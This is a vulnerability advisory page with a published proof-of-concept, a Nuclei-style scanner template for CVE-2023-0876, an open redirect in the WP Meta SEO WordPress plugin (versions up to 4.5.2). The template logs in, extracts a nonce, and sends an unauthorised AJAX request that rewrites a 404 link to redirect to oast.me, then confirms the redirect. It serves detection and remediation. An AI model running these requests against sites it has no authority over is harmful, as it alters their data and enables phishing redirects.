漏洞描述
The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability.
CVE-2023-0876: WordPress Meta SEO <= 4.5.2 - Open Redirect
PoC代码[已公开]
id: CVE-2023-0876
info:
name: WordPress Meta SEO <= 4.5.2 - Open Redirect
author: Khalid6468
severity: medium
description: |
The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability.
remediation: |
Update the plugin to version 4.5.3 or later to fix the arbitrary redirect vulnerability.
reference:
- https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
- https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0876
cwe-id: CWE-601
epss-score: 0.06603
epss-percentile: 0.90817
cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
fofa-query: body="/wp-content/plugins/wp-meta-seo/"
vendor: joomunited
product: wp_meta_seo
framework: wordpress
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect
variables:
link_endpoint: "{{rand_text_numeric(5)}}"
redirect_url: "https://oast.me"
flow: http(1) || http(2) && http(3) && http(4) && http(5) && http(6)
http:
- raw:
- |
GET /wp-content/plugins/wp-meta-seo/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- compare_versions(version, '<= 4.5.2')
condition: and
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
GET /?p={{link_endpoint}} HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- "status_code == 404"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302 || status_code == 200'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'wpms_nonce')"
condition: and
internal: true
extractors:
- type: regex
name: wpms_nonce
group: 1
regex:
- 'wpms_nonce.*?([0-9a-z]+)'
part: body
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
#The WP Meta SEO plugin automatically created entries in the wp_wpms_links table for 404 pages, with the link_id field stored in this DB table. This link_id input was required to validate the redirection.
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body, 'status', 'contains','success', 'updated','redirect')"
condition: and
internal: true
- raw:
- |
GET /?p={{link_endpoint}} HTTP/1.1
Host: {{Hostname}}
redirects: false
max-redirects: 0
matchers:
- type: dsl
dsl:
- "status_code == 302"
- 'contains(header, "Location: {{redirect_url}}")'
condition: and
# digest: 4b0a00483046022100d65515b2b11705fffc92df13a20942b01f2f0363f6dedb655eb4cd9cad44fb44022100c92c14234abea9d26ace3f4c90bfdeb1453bfecf52f95ef38fbfebe54a378a7b:922c64590222798bb761d5b6d8e72950